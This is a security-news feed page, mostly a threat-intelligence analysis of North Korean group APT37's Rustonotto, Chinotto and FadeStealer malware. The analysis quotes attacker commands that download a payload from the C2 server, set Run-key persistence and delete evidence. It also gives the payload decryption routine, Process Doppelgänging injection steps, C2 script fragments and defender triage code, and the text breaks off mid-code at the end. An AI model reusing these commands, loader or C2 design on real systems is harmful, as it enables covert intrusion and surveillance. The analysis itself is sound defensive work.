10 Questions CISOs Should Be Asking About File Security
The post 10 Questions CISOs Should Be Asking About File Security appeared first on Votiro.
The post 10 Questions CISOs Should Be Asking About File Security appeared first on Security Boulevard.
Contrast customers get certainty in moments when everyone else is guessing. When a code dependency supply-chain attack hits, they do not waste hours asking if they might be exposed. They know immediately whether their applications are running compromised code, and they can act with confidence.
The post How ADR Secures Against NPM Supply Chain Attacks | Application Detection and Response | Contrast Security appeared first on Security Boulevard.
Cisco at its Splunk .conf conference today added a series of artificial intelligence (AI) agents to its cybersecurity portfolio in addition to now making two editions of the Splunk Enterprise platform available. Ryan Fetterman, senior manager for AI security research at the Foundation AI arm of Cisco, said AI agents will play a significant role..
The post Cisco Adds Bevy of AI Agents to Splunk Security Platform appeared first on Security Boulevard.
SaaS supply chain attacks exploit SaaS-to-SaaS connections using stolen OAuth tokens. Get practical steps to reduce your risk and protect business data.
The post How New Supply Chain Attacks Challenge SaaS Security: Lessons from UNC6395, UNC6040, and ShinyHunters appeared first on AppOmni.
The post How New Supply Chain Attacks Challenge SaaS Security: Lessons from UNC6395, UNC6040, and ShinyHunters appeared first on Security Boulevard.
Creator, Author and Presenter: Rob King
Our deep appreciation to Security BSides - San Francisco and the Creators, Authors and Presenters for publishing their BSidesSF 2025 video content on YouTube. Originating from the conference’s events held at the lauded CityView / AMC Metreon - certainly a venue like no other; and via the organization's YouTube channel.
Additionally, the organization is welcoming volunteers for the BSidesSF Volunteer Force, as well as their Program Team & Operations roles. See their succinct BSidesSF 'Work With Us' page, in which, the appropriate information is to be had!
The post BSidesSF 2025: There And Back Again: Discovering OT Devices Across Protocol Gateways appeared first on Security Boulevard.
By integrating SonarQube's industry-leading automated code review with JFrog's new AppTrust governance platform, together we are providing the essential framework for software engineering teams to embrace AI-driven speed without compromising on control.
The post Analysis evidence from SonarQube now available in JFrog AppTrust appeared first on Security Boulevard.
Microsoft addresses 80 CVEs, including eight flaws rated critical with one publicly disclosed.
Microsoft addresses 80 CVEs in its September 2025 Patch Tuesday release, with eight rated critical, and 72 rated important. Our counts omitted one vulnerability reported by VulnCheck.
This month’s update includes patches for:
Elevation of Privilege (EoP) vulnerabilities accounted for 47.5% of the vulnerabilities patched this month, followed by Remote Code Execution (RCE) vulnerabilities at 27.5%.
Important CVE-2025-55234 | Windows SMB Elevation of Privilege Vulnerability

CVE-2025-55234 is an EoP vulnerability affecting Windows Server Message Block (SMB). It was assigned a CVSSv3 score of 8.8 and rated as important. Successful exploitation would allow an unauthenticated attacker to elevate their privileges to that of the compromised user's account. According to Microsoft, this vulnerability was publicly disclosed prior to a patch being made available.
CVE-2025-55234 appears to have been released to help customers audit and assess their environment and identify incompatibility issues prior to utilizing some of the hardening capabilities for SMB Servers.
CVE-2025-55234 is the fifth Windows SMB vulnerability patched in 2025 and the third Windows SMB EoP disclosed this year. In the June 2025 Patch Tuesday release, Microsoft patched CVE-2025-33073, another publicly disclosed Windows SMB EoP vulnerability. A day after the June 2025 Patch Tuesday release, researchers from RedTeam Pentesting GmbH, one of many researchers credited with reporting the flaw to Microsoft, released a blog post detailing the vulnerability, including proof-of-concept details.
Critical CVE-2025-54918 | Windows NTLM Elevation of Privilege Vulnerability

CVE-2025-54918 is an EoP vulnerability in Windows New Technology LAN Manager (NTLM). It was assigned a CVSSv3 score of 8.8 and is rated critical. It was assessed as “Exploitation More Likely” according to Microsoft’s Exploitability Index. According to the advisory, successful exploitation would allow an attacker to elevate their privileges to SYSTEM.
This is the second month in a row that a critical NTLM EoP vulnerability was patched and the third in 2025. In the August 2025 Patch Tuesday release, Microsoft patched CVE-2025-53778, and CVE-2025-21311 in the January 2025 Patch Tuesday release.
Important CVE-2025-54916 | Windows NTFS Remote Code Execution Vulnerability

CVE-2025-54916 is a RCE in Microsoft Windows New Technology File System (NTFS). It was assigned a CVSSv3 score of 7.8 and is rated important and assessed as “Exploitation More Likely.” An attacker that successfully exploits this flaw would gain RCE on the targeted system. According to the advisory, any authenticated attacker could leverage this vulnerability.
Since 2022, the bulk of NTFS vulnerabilities patched across Patch Tuesday have been EoP or Information Disclosure vulnerabilities. However, this is the second NTFS RCE vulnerability since 2022 and the second in 2025. The first, CVE-2025-24993, patched in the March 2025 Patch Tuesday release, was exploited in the wild as a zero-day.
Critical CVE-2025-54910 | Microsoft Office Remote Code Execution Vulnerability

CVE-2025-54910 is a RCE in Microsoft Office. It was assigned a CVSSv3 score of 8.4 and is rated critical and assessed as “Exploitation Less Likely.” An attacker could exploit this vulnerability by convincing a target to open a specially crafted Office document. Additionally, the advisory notes that exploitation is possible through Microsoft Outlook’s Preview Pane. Successful exploitation would grant the attacker RCE privileges on the target system. For users of Microsoft Office LTSC for Mac 2021 and 2024, the advisory states that updates are not yet available, but will be released soon.
Important CVE-2025-54897 | Microsoft SharePoint Remote Code Execution Vulnerability

CVE-2025-54897 is a RCE vulnerability in Microsoft SharePoint. It was assigned a CVSSv3 score of 8.8 and is rated important and assessed as “Exploitation Less Likely.” In order to exploit this flaw, an attacker would need to be authenticated as any user; privileged accounts, such as an admin account or other elevated privileges, are not necessary. Once authenticated, an attacker could either write arbitrary code or use code injection to execute code on a vulnerable SharePoint Server to gain RCE.
Critical CVE-2025-55224 | Windows Hyper-V Remote Code Execution Vulnerability

CVE-2025-55224 is a RCE in Windows Hyper-V. It was assigned a CVSSv3 score of 7.8, rated as critical and assessed as “Exploitation Less Likely.” According to the advisory, an attacker who is able to win a race condition could traverse from the guest host's security boundary in order to execute arbitrary code on the Hyper-V host machine. While the attack complexity for this vulnerability is high, the impact would be significant for an attacker who is able to successfully exploit this vulnerability.
Important CVE-2025-54091, CVE-2025-54092, CVE-2025-54098, CVE-2025-54115 | Windows Hyper-V Elevation of Privilege Vulnerabilities

CVE-2025-54091, CVE-2025-54092, CVE-2025-54098, CVE-2025-54115 are EoP vulnerabilities in Windows Hyper-V, Microsoft’s virtualization product. CVE-2025-54091, CVE-2025-54092, CVE-2025-54098 were assigned a CVSSv3 score of 7.8 while CVE-2025-54115 was assigned a CVSSv3 score of 7.0. CVE-2025-54098 was assessed as “Exploitation More Likely” while the remaining three flaws were assessed as “Exploitation Less Likely.”
A local, authenticated attacker could exploit these vulnerabilities to elevate to SYSTEM privileges, though in order to exploit CVE-2025-54115, an attacker would first need to win a race condition, which is what contributed to its lower CVSS score.
Tenable Solutions

A list of all the plugins released for Microsoft’s September 2025 Patch Tuesday update can be found here. As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems yet to be patched.
For more specific guidance on best practices for vulnerability assessments, please refer to our blog post on How to Perform Efficient Vulnerability Assessments with Tenable.
Get more information

Join Tenable's Research Special Operations (RSO) Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
The post Microsoft’s September 2025 Patch Tuesday Addresses 80 CVEs (CVE-2025-55234) appeared first on Security Boulevard.
Key Takeaways

For years, European companies have faced a patchwork of national laws pushing them to take responsibility for human rights and environmental issues tied to their business operations. France passed its Duty of Vigilance law in 2017. Germany followed with the EU Supply Chain Act in 2021. Each aimed to hold companies accountable not […]
The post Understanding the EU Corporate Sustainability Due Diligence Directive (CSDDD): Why It Matters and How to Prepare appeared first on Centraleyes.
The post Understanding the EU Corporate Sustainability Due Diligence Directive (CSDDD): Why It Matters and How to Prepare appeared first on Security Boulevard.
What FireMon Insights reveals about firewall policy risk and how to fix it. Firewall management is the unsung hero (or hidden villain) of security...
The post 60% fail. Are you one of them? appeared first on Security Boulevard.
A sophisticated npm supply chain attack compromised popular packages
The post NPM Supply Chain Attack: Sophisticated Multi-Chain Cryptocurrency Drainer Infiltrates Popular Packages appeared first on Security Boulevard.
Preventive tech isn’t about counting steps anymore. It’s about who owns the future of human performance. The difference between a scrappy prototype and an enterprise-grade...
The post Scaling Preventive Tech: From Startup Prototype to Enterprise-Grade Wellness Platform appeared first on ISHIR | Software Development India.
The post Scaling Preventive Tech: From Startup Prototype to Enterprise-Grade Wellness Platform appeared first on Security Boulevard.
via the comic artistry and dry wit of Randall Munroe, creator of XKCD
The post Randall Munroe’s XKCD ‘Cesium’ appeared first on Security Boulevard.
The Chinese state-sponsored group APT41 is accused of using a fake email impersonating a U.S. representative, containing spyware and sent to government agencies, trade groups, and law firms, to gain information about U.S. strategy in trade talks with China.
The post Chinese Group Accused of Using Fake U.S. Rep. Email to Spy on Trade Talks appeared first on Security Boulevard.
UltraViolet Cyber has acquired the application security testing services arm of Black Duck Software as part of an effort to expand the scope of the managed security services it provides. Company CEO Ira Goldstein said this addition to its portfolio will provide penetration testing, red teaming, threat modeling, cloud and container risk assessments, architecture risk..
The post UltraViolet Cyber Acquires Application Security Testing Service from Black Duck appeared first on Security Boulevard.
Creator, Author and Presenter: Clint Gibler
The post BSidesSF 2025: Sharing Vulnerabilities appeared first on Security Boulevard.
42% of developer time goes to fixing tech debt instead of building features. Knight Capital lost $460M in one day due to unaddressed code issues. Here's why smart companies fix P0/P1 problems first, and the framework that helped me scale startups without constant firefighting.
The post Tech Debt: Why Fixing the Foundation Comes Before Building the Castle appeared first on Security Boulevard.
Zero Trust isn’t just a strategy. It’s a survival skill. “Never trust, always verify” sounds simple enough, but most organizations discover that applying it to sprawling hybrid networks is anything...
The post How to Embrace Zero Trust Without Blowing Up Your Network appeared first on Security Boulevard.
Introduction

APT37 (also known as ScarCruft, Ruby Sleet, and Velvet Chollima) is a North Korean-aligned threat actor active since at least 2012. APT37 primarily targets South Korean individuals connected to the North Korean regime or involved in human rights activism, leveraging custom malware and adopting emerging technologies.

In recent campaigns, APT37 utilizes a single command-and-control (C2) server to orchestrate all components of their malware arsenal, including a Rust-based backdoor that ThreatLabz dubbed Rustonotto (also known as CHILLYCHINO), a PowerShell-based malware known as Chinotto, and FadeStealer. Rustonotto is a newly identified backdoor in use since June 2025. Chinotto is a well-documented PowerShell backdoor that has been in use since 2019. FadeStealer, first discovered in 2023, is a surveillance tool that records keystrokes, captures screenshots and audio, monitors devices and removable media, and exfiltrates data via password-protected RAR archives.

In this blog post, Zscaler ThreatLabz delves into the tactics and tools used by APT37. The technical analysis explores APT37's sophisticated tactics, including spear phishing, Compiled HTML Help (CHM) file delivery, and Transactional NTFS (TxF) for stealthy code injection.

Key Takeaways

- APT37 is a North Korean-aligned threat actor active since at least 2012 that primarily targets individuals connected to the North Korean regime or involved in human rights activism.
- In recent campaigns, APT37 utilizes a single command-and-control (C2) server to orchestrate all components of their malware arsenal, including the Rust-based backdoor we named Rustonotto, the PowerShell-based Chinotto malware, and FadeStealer.
- FadeStealer, first identified in 2023, is a surveillance tool designed to log keystrokes, capture screenshots and audio, track devices and removable media, and exfiltrate data through password-protected RAR archives.
- FadeStealer leverages HTTP POST and Base64 encoding for communication with its command-and-control (C2) server.
- APT37 utilizes Windows shortcut files and Windows help files as initial infection vectors.
- Rustonotto, active since June 2025, is a Rust-compiled malware, representing the first known instance of APT37 leveraging Rust-based malware to target Windows systems.
- Using simple backdoors in the initial stage, the threat actor deployed FadeStealer via a Python-based infection chain.

Overview

S2W published a comprehensive report on the same threat actor, detailing PubNub-based communication malware and the deployment of VCD ransomware. In this blog post, ThreatLabz expands on these findings and highlights the infection chain observed, along with the C2 operations that orchestrate the full tradecraft of this threat actor.

ThreatLabz’s latest findings suggest that APT37 utilized the Rust programming language to create a lightweight backdoor we named Rustonotto, which has basic functionality for executing Windows commands and sending the results to a threat actor-controlled server. While Rustonotto may appear simplistic, the use of Rust highlights the group's ongoing effort to adopt modern languages and potentially support multi-platform attacks. APT37 also employed a Python-based loader implementing the Process Doppelgänging code injection technique to deploy a custom-built stealer designed for data exfiltration.

ThreatLabz collaborated with the Korea National Police Agency (KNPA) by providing technical analysis to support their investigation of APT37.

Technical Analysis

Attack chain

ThreatLabz reconstructed the APT37 infection chain that begins with an initial compromise via a Windows shortcut or a Windows help file, followed by Chinotto dropping FadeStealer through a sophisticated infection process. The attack chain is depicted in the figure below.

Figure 1: Full infection chain involving Chinotto, Rustonotto, and FadeStealer.

Windows shortcut and Rustonotto

In one campaign, APT37 utilizes a Windows shortcut file. When this shortcut file (MD5: b9900bef33c6cc9911a5cd7eeda8e093) is launched, a malicious PowerShell script, Chinotto, is invoked that extracts an embedded decoy and payload using predefined markers. The steps outlined below detail the infection process initiated when the victim executes Chinotto.

1. Scans %temp% and the current working directory for its own Windows shortcut file, validating its exact size (6,032,787 bytes) to ensure the correct file is processed.
2. Reads the Windows shortcut, converts the byte values to ASCII, and extracts two hex-encoded payloads delimited by the markers AEL (first payload start), BEL (second payload start), and EOF (end of file marker).
3. Converts the first hex payload to binary and writes it as C:\ProgramData\NKView.hwp, then launches it as a decoy document.
4. Decodes the second payload and writes it as C:\ProgramData\3HNoWZd.exe, which functions as the main executable.
5. Creates a scheduled task named MicrosoftUpdate, configured to execute 3HNoWZd.exe every 5 minutes using schtasks.

The decoy document is a Hangul Word Processor (HWP) file titled “Two Perspectives on North Korea in South Korean Society”, which was last modified on June 11, 2025.

Figure 2: Example decoy document dropped by an APT37 Windows shortcut file.

The dropped payload is Rustonotto, which is a Rust-compiled binary (MD5: 7967156e138a66f3ee1bfce81836d8d0). Rustonotto receives Base64-encoded Windows commands and returns the execution results also in a Base64-encoded format. The steps below illustrate the sequence of Rustonotto’s behavior, specifically focusing on its C2 communication.

1. Establishes an HTTP connection to the C2 server with the U= HTTP query parameter.
2. Makes HTTP requests to the C2 server to fetch commands.
3. Executes the commands received.
4. Captures the command output and sends the result back to the C2 server with the R= HTTP query parameter.

Windows help file and PowerShell-based payload

In another campaign, the threat actor used a Windows help file (CHM) to deliver malware, a method that ThreatLabz has observed APT37 use before. In this case, the victim was sent a RAR file named 2024-11-22.rar. Inside the RAR archive were two files: a password-protected ZIP archive called KT그룹 채용 (translated as KT Job Description) and a malicious Windows help file named Password.chm (which was disguised as a document containing the password for the ZIP archive). The malicious CHM file, when opened, creates a registry value under the Run key to trigger the download and execution of an HTML Application (HTA) file from the threat actor’s server each time the current user logs on. The example below shows how the CHM file is configured to perform this action:

The HTA file (1.html) downloaded by the CHM contains a malicious PowerShell script that acts as a backdoor, allowing the threat actor to control the infected computer remotely. The backdoor, known as Chinotto, is capable of performing various tasks, such as transferring files, executing commands, modifying the registry, creating scheduled tasks, and more. When Chinotto launches, it creates a unique victim identifier by combining the computer name and the username, which Chinotto uses when communicating with the C2 server. Chinotto connects to the same C2 server URL previously associated with Rustonotto.

To avoid running the malware more than once on the same machine, Chinotto generates a file named %TEMP%\jMwVrHdPtpv as an execution marker. Every 5 seconds, Chinotto checks the threat actor’s C2 server for new instructions via HTTP POST requests, sending the victim ID (formatted as U=[victim ID]). Chinotto then receives commands from the server, which are Base64 decoded and executed on the infected system. The table below shows the commands supported by Chinotto, along with their description.

Command | Description
FINFO | Collects file information (name, size, timestamps, path) from a specified directory, saves it to a CSV file, and uploads the CSV to the C2 server.
DIRUP | Compresses the contents of a specified directory into a ZIP archive and uploads the ZIP to the C2 server.
SFILE | Uploads a specified file to the C2 server.
DOWNF | Downloads a file from a given URL and saves it to a specified path.
CURLC | Uses curl to download a file from a URL and saves it to a specified path.
REGED | Modifies the Windows registry at a specified location, setting the name and value.
TASKA | Creates a scheduled task to run a specified command at regular intervals.
ZIPEX | Extracts the contents of a ZIP archive to a specified destination.
RENAM | Renames a specified file or directory.
DELET | Deletes a specified file or directory.

Table 1: Commands supported by the Chinotto backdoor.

When Chinotto completes execution, it sends a Base64-encoded done message back to the C2 server with the R= HTTP query parameter.

Transacted injection

The threat actor's hands-on-keyboard activities with the implanted Chinotto variant involved delivering malicious payloads packaged in Microsoft Cabinet (.CAB) files. These payloads, equipped with Python-based launchers, were extracted and executed upon delivery.
The commands used to deliver and execute the payloads are outlined in the table below.

Delivered command | Description
curl http://[redacted]/images/test/wonder.dat -o "c:\programdata\wonder.cab" | Fetches the Microsoft Cabinet (CAB) file payload from the C2 server.
expand c:\programdata\wonder.cab -F:* c:\programdata | Extracts the contents of the .CAB file to the specified directory.
del /f /q c:\programdata\wonder.cab | Deletes the .CAB file to remove evidence.
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v TeleUpdate /d "c:\programdata\tele_update\tele_update.exe c:\programdata\tele_update\tele.conf c:\programdata\tele_update\tele.dat" /f | Adds a registry entry to enable automatic execution at system startup or login.
c:\programdata\telegram_update\tele_update.exe c:\programdata\telegram_update\tele.conf c:\programdata\telegram_update\tele.dat | Launches FadeStealer with its associated configuration and data files.

Table 2: Example APT37 commands executed to deliver FadeStealer.

Each file executed during the threat actor’s hands-on-keyboard activity includes three components:

- A legitimate Python module (tele_update.exe).
- A compiled Python module (tele.conf) that decrypts and loads FadeStealer from a file named tele.dat.
- The FadeStealer payload (tele.dat), Base64-encoded and XOR encrypted.

The compiled Python module, created on 2025-04-01 05:42:03, is internally named TransactedHollowing.py, suggesting the use of a technique for stealthily injecting and executing arbitrary code within a legitimate Windows process.

The script is designed to process a single input file containing a Base64-encoded payload. The script decodes the payload and applies a custom XOR-based decryption routine to extract a Windows executable. The decrypted executable is intended for injection into a target process. The following code demonstrates the decryption routine used to unpack the payload.

```python
import base64


def decrypt_custom_encoded_file(file_path):
    try:
        # Open the file in binary mode and read its content
        with open(file_path, "rb") as file:
            encoded_data = file.read()
        # Decode the content from base64
        decoded_data = base64.b64decode(encoded_data)
        # Read offset and update it (byte 0 says how many bytes to skip before the key length)
        offset = decoded_data[0]
        offset += 1
        # Get key length and update offset
        key_length = decoded_data[offset]
        offset += 1
        # Extract the XOR key
        xor_key = decoded_data[offset : offset + key_length]
        offset += key_length
        # Decrypt the rest of the data using XOR with the key
        decrypted = bytes([
            decoded_data[i] ^ xor_key[(i - offset) % key_length]
            for i in range(offset, len(decoded_data))
        ])
        return decrypted
    except (OSError, ValueError, IndexError) as exc:
        # Unreadable file, invalid Base64, or a header shorter than the declared key length
        raise ValueError(f"failed to unpack {file_path}") from exc
```

After unpacking the original payload, the Python script employs the Process Doppelgänging technique to inject the payload into a legitimate Windows process. The technique involves the following steps:

Transacted file creation and section object setup

- The script uses Windows Transactional NTFS (TxF) APIs (e.g., CreateFileTransactedW) to create a new file within a transaction context.
- The decrypted Portable Executable (PE) payload is written to the transacted file.
- The function NtCreateSection is called to create a memory section object, using the transacted file as the backing store for the payload's memory.
- The transaction is rolled back (RollbackTransaction), while preserving the section object in memory.
- The temporary file handle is closed, and the file is deleted, leaving no trace of the payload on disk.

Suspended process creation

- The script randomly selects a legitimate Windows system executable from a predefined list. Examples include: calc.exe, msinfo32.exe, svchost.exe, GamePanel.exe, UserAccountControlSettings.exe, and control.exe.
- The script creates a new process associated with the chosen executable in a suspended state.

Section mapping, context manipulation, and execution

- The section object containing the payload is mapped into the address space of the suspended process using NtMapViewOfSection.
- The script modifies the thread context of the suspended process (via GetThreadContext / SetThreadContext or their Wow64 equivalents) to redirect execution to the payload's entry point.
- The Process Environment Block (PEB) of the target process is updated to reflect the new image base address associated with the injected payload.
- The main thread of the process is resumed (ResumeThread), triggering the execution of the injected payload.

The decrypted malware is FadeStealer, the same data-theft tool previously documented by AhnLab.
FadeStealer periodically gathers files from the infected system, compresses them into password-protected RAR archives, and transmits them to a C2 server. When launched, FadeStealer creates working directories under the %TEMP%\VSTelems_Fade\ folder. FadeStealer has two main functions: automatically exfiltrating sensitive files and sending specific files as directed by commands specified by the threat actor.

FadeStealer file stealing commands

Once connected to the C2 server, FadeStealer receives Base64-encoded commands specifying a file path and a search pattern, separated by the | character. These commands direct the malware to gather target files based on the criteria provided. After collecting the files, FadeStealer creates a timestamped RAR archive (e.g., data_YYYY_MM_DD-HH_MM_SS.rar) and sends it back to the C2 server. Some example commands are listed below:

- C:\Users\|*.doc: Collect all Word documents from the Users directory.
- C:\Documents\|*.*: Collect all files from the Documents folder.
- D:\|*.pdf: Collect all PDF files from the D: drive.

Table 3: Example commands supported by FadeStealer.

FadeStealer surveillance

In surveillance mode, FadeStealer operates multiple threads, each dedicated to monitoring and collecting specific types of data from the infected system. These threads function independently to capture keystrokes, screenshots, audio recordings, and file content from connected devices. In the table below, the capabilities, collection frequency, file naming patterns, and storage locations of the malware are listed.

Capability | Frequency | Files Collected | Directory
Records all keystrokes | Real-time | key_YYYY_MM_DD.log | %TEMP%\VSTelems_Fade\NgenPdbk\
Captures screen images | Every 30 sec | YYYY_MM_DD-HH_MM_SS.jpg | %TEMP%\VSTelems_Fade\NgenPdbc\
Records microphone audio | 5-min sessions | YYYY_MM_DD-HH_MM_SS.wav | %TEMP%\VSTelems_Fade\NgenPdbm\
Monitors for USB devices | Every 1 hour | usb_YYYY_MM_DD-HH_MM_SS.rar | %TEMP%\VSTelems_FadeOut\
Monitors cameras/portable devices | Every 1 hour | [DeviceName]_YYYY_MM_DD-HH_MM_SS.rar | %TEMP%\VSTelems_FadeIn\

Table 4: Surveillance capabilities and corresponding files associated with FadeStealer.

FadeStealer compiles all the collected data into a RAR archive every hour, using a naming format like watch_YYYY_MM_DD-HH_MM_SS.rar. This archive includes files stored in the main directory (%TEMP%\VSTelems_Fade\), which contain keylogging data, screenshots, audio recordings, and captured files.
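The directory layout and file-name conventions above (Table 4, the hourly watch_*.rar bundles, the data_*.rar command archives) are stable enough to triage a host listing against. The following Python is an added example, not ThreatLabz tooling: it classifies each path, extracts the embedded timestamp so an analyst can bound when each surveillance component ran, and also flags Chinotto's %TEMP%\jMwVrHdPtpv marker; the sample listing, the victim user name and the "Galaxy S10" device name are constructed.

```python
import re
from datetime import datetime

TS = r"(?P<ts>\d{4}_\d{2}_\d{2}-\d{2}_\d{2}_\d{2})"
TS_FMT = "%Y_%m_%d-%H_%M_%S"

# Working directories FadeStealer creates under %TEMP% (Table 4), as lower-cased path suffixes.
FADE_DIRS = [
    ("\\vstelems_fade\\ngenpdbk", "keylogger output"),
    ("\\vstelems_fade\\ngenpdbc", "screenshots"),
    ("\\vstelems_fade\\ngenpdbm", "microphone recordings"),
    ("\\vstelems_fadeout", "USB device contents"),
    ("\\vstelems_fadein", "MTP device contents"),
    ("\\vstelems_fade", "hourly surveillance bundles"),
]

# File-name conventions from the report. Fixed prefixes come before the generic
# [DeviceName]_<timestamp>.rar rule so usb_/data_/watch_ are not misread as device names.
NAME_RULES = [
    (re.compile(r"^key_(?P<ts>\d{4}_\d{2}_\d{2})\.log$", re.I), "keylog", "%Y_%m_%d"),
    (re.compile(rf"^{TS}\.jpg$", re.I), "screenshot", TS_FMT),
    (re.compile(rf"^{TS}\.wav$", re.I), "audio", TS_FMT),
    (re.compile(rf"^watch_{TS}\.rar$", re.I), "hourly bundle", TS_FMT),
    (re.compile(rf"^usb_{TS}\.rar$", re.I), "usb archive", TS_FMT),
    (re.compile(rf"^data_{TS}\.rar$", re.I), "command archive", TS_FMT),
    (re.compile(rf"^(?P<dev>.+?)_{TS}\.rar$", re.I), "device archive", TS_FMT),
]

CHINOTTO_MARKER = "jmwvrhdptpv"  # %TEMP%\jMwVrHdPtpv, Chinotto's run-once marker file


def _split(path):
    """Return (lower-cased directory, file name) for a Windows or POSIX-style path."""
    norm = path.replace("/", "\\").rstrip("\\")
    head, _, name = norm.rpartition("\\")
    return head.lower(), name


def classify(path):
    """Return a finding dict for one path, or None if nothing on it matches the report."""
    directory, name = _split(path)
    in_temp = directory.endswith("\\temp") or "\\temp\\" in directory
    fade_role = next((role for suffix, role in FADE_DIRS if directory.endswith(suffix)), None)

    if in_temp and name.lower() == CHINOTTO_MARKER:
        return {"path": path, "kind": "chinotto marker", "when": None, "confidence": "high"}

    for rule, kind, fmt in NAME_RULES:
        match = rule.match(name)
        if not match:
            continue
        finding = {"path": path, "kind": kind, "when": datetime.strptime(match.group("ts"), fmt)}
        if kind == "device archive":
            finding["device"] = match.group("dev")
        if fade_role is not None:
            finding["confidence"] = "high"
        elif kind == "command archive":
            finding["confidence"] = "medium"  # per the report, data_*.rar may be written anywhere
        else:
            return None  # a timestamped name alone is too weak outside the Fade directories
        finding["directory_role"] = fade_role
        return finding

    if fade_role is not None:  # unknown file inside a FadeStealer directory: still worth a look
        return {"path": path, "kind": "unclassified", "when": None,
                "confidence": "low", "directory_role": fade_role}
    return None


def triage(paths):
    """Classify every path; highest-confidence findings first."""
    order = {"high": 0, "medium": 1, "low": 2}
    findings = [f for f in map(classify, paths) if f]
    return sorted(findings, key=lambda f: (order[f["confidence"]], f["path"]))


SAMPLE_LISTING = [  # constructed host listing for the demonstration, not real victim data
    r"C:\Users\victim\AppData\Local\Temp\VSTelems_Fade\NgenPdbk\key_2025_06_11.log",
    r"C:\Users\victim\AppData\Local\Temp\VSTelems_Fade\NgenPdbc\2025_06_11-09_15_30.jpg",
    r"C:\Users\victim\AppData\Local\Temp\VSTelems_Fade\NgenPdbm\2025_06_11-09_20_00.wav",
    r"C:\Users\victim\AppData\Local\Temp\VSTelems_Fade\watch_2025_06_11-10_00_00.rar",
    r"C:\Users\victim\AppData\Local\Temp\VSTelems_FadeOut\usb_2025_06_11-10_05_00.rar",
    r"C:\Users\victim\AppData\Local\Temp\VSTelems_FadeIn\Galaxy S10_2025_06_11-11_00_00.rar",
    r"C:\Users\victim\AppData\Local\Temp\jMwVrHdPtpv",
    r"C:\Users\victim\Desktop\data_2025_06_11-12_30_00.rar",
    r"C:\Users\victim\AppData\Local\Temp\VSTelems_Fade\readme.txt",
    r"C:\Users\victim\Documents\report_2025_06_11-10_00_00.rar",  # timestamped but benign
    r"C:\Users\victim\Documents\notes.docx",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LISTING):
        print(f"{f['confidence']:6} {f['kind']:16} {f['path']}")
```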
A separate thread is responsible for uploading these archives to the C2 server. To ensure timely exfiltration, another thread actively monitors and identifies archived RAR files every 10 seconds, sending them to the C2 server upon detection.

In the table below, the source directories, archive types, and the contents of the collected data are outlined.

Source Directory | Archive Type | Content
%TEMP%\VSTelems_Fade\ | watch_YYYY_MM_DD-HH_MM_SS.rar | Hourly surveillance data consolidated (keylogging, screenshots, audio).
%TEMP%\VSTelems_FadeOut\ | usb_YYYY_MM_DD-HH_MM_SS.rar | USB device contents collected when inserted.
%TEMP%\VSTelems_FadeIn\ | [DeviceName]_YYYY_MM_DD-HH_MM_SS.rar | MTP-enabled devices such as smartphones, cameras, and media player contents gathered during monitoring.
Any location | data_YYYY_MM_DD-HH_MM_SS.rar | Files collected via remote commands.

Table 5: Filenames and paths used for surveillance by FadeStealer.

When sending files, FadeStealer uses HTTP POST requests with multipart form data, specifying myboundary as the boundary name. Additionally, when creating a RAR archive, FadeStealer utilizes the hardcoded password NaeMhq[d]q to encrypt the RAR content and employs a custom RAR.exe tool extracted from its embedded resources.

C2 server

The threat actor leveraged vulnerable web servers to act as C2 servers for managing malware operations. The C2 PHP script used by APT37 is a lightweight and file-based backend, facilitating communication between the threat actor and the malware implants. The C2 server enables command delivery, result collection, and file uploads, all organized within a single JSON file (info).

Using this simple yet effective script, the threat actor controlled the entire suite of malware tools used in the campaign. This included Rustonotto, Chinotto, and FadeStealer, all of which utilized the same Base64-encoded format for communication.
While some malware variants featured slight differences in command structures, the C2 server PHP script provided unified and streamlined control over the entire malware toolset. The figure below illustrates how the C2 server functioned as a central hub for delivering commands, collecting results, and handling uploads across the different malware components in the campaign.Figure 3: APT37 C2 server architecture for Rustonotto, Chinotto, and FadeStealer.The APT37 C2 server maintains two arrays: a parent array for storing results received from the malware implant and a child array for storing commands issued by the threat actor. The code sample below demonstrates how the APT37 C2 server initializes its operation.…
// On first run, create the "info" store with an empty parent (results) array and an empty child (commands) array
if (!file_exists("info"))
{
file_put_contents("info", '{"parent" : [{"id" : "", "text" : ""}], "child" : [{"id" : "", "text" : ""}]}');
}
// Load the current state of both arrays for this request
$jsonStored = '';
$jsonStored = json_decode(file_get_contents("info"));
…

The APT37 C2 server handles incoming HTTP requests differently depending on whether they originate from the threat actor or the malware implant. Requests are processed based on specific types and associated parameters, as outlined in the table below.

Request Type | Parameter | Description
GET/POST | U=parent | When the threat actor sends the query string U=parent, the C2 sends back the entire parent array, containing results from the clients. After delivering the response, the C2 resets the parent array to empty.
GET | U=&C= | When the threat actor issues a command for a specific client, the Base64-encoded command is decoded and stored in the child array under the client’s ID. If the entry already exists, it is updated; otherwise, a new entry is created. The command is delivered to the client during its next poll and then cleared from the store.
POST | U=&R= | When a client sends back a result, the result is Base64-decoded and stored in the parent array under the client’s ID. If the entry already exists, it is updated; otherwise, a new entry is created. The threat actor can later retrieve these results using the query string U=parent.
POST | U=&_file= | When a client uploads a file, it is saved in the current directory with a filename prefixed by the client’s ID. The final filename format is _. If the file already exists, the data is appended.
GET/POST | U= | When a client polls for commands without sending a result or file, the script checks the child array for pending commands. If a command is found, it is delivered and cleared. If no command exists, the script checks the parent array. If no result is present, it responds with a default handshake message ("SEVMTw==", Base64 for "HELLO").

Table 6: APT37 C2 server HTTP parameters and their corresponding purposes.

The threat actor retrieves exfiltrated files from the compromised machine by issuing a direct GET request to the C2 server, leveraging prior knowledge of the client ID and the specific file name.
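As an added defender-side illustration (not code from the report, the malware, or the C2 script), the following Python triages constructed web-server access-log lines against the request shapes in Table 6 and the archive naming in Table 5, so a responder reviewing a suspected compromised web server can see which lines look like operator traffic versus implant traffic. The script path, the client ID "client01", and the Base64 payloads are assumptions.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not real traffic) shaped like the requests in Table 6.
# Script path, client ID "client01" and the Base64 payloads are assumptions.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php?U=client01 HTTP/1.1" 200 8
203.0.113.10 - - [01/Jan/2025:10:00:10 +0000] "POST /index.php?U=client01&R=ZG9uZQ== HTTP/1.1" 200 0
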